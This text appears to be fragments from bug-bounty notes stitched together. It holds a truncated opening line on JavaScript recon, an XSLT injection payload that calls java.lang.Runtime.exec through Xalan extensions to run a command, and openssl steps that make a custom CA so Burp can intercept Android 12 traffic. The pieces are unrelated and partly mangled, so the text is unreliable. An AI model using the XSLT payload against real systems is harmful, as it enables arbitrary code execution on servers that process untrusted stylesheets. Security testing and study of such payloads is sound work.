This is a simple guide to perform javascript recon in the bugbounty
- The first step is to collect possibly several javascript files (
more files
=more paths,parameters
->more vulns
)
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> | |
<xsl:template> | |
<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; --> | |
<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; --> | |
<!-- #114 Utf8: open -a calculator --> | |
<!-- #115 String: touch /tmp/pwn --> | |
<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/> | |
<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/> | |
<!-- #132 Utf8: <init> --> | |
<AAA select="<init>"/> |
My android 12 does not accept the default burp certificate, you have to generate a unique certificate. Then import this into burp and use the commands to make it compatible with Android.
mkdir cert && cd cert
openssl req -x509 -days 730 -nodes -newkey rsa:2048 -outform der -keyout server.key -out ca.der -extensions v3_ca #generate ca
openssl rsa -in server.key -inform pem -out server.key.der -outform der #convert
openssl pkcs8 -topk8 -in server.key.der -inform der -out server.key.pkcs8.der -outform der -nocrypt #convert to pkcs8
openssl x509 -inform der -in ca.der -out ca.pem
cp ca.pem `openssl x509 -inform pem -subject_hash_old -in ca.pem | head -1`.0 #create a filename with the hash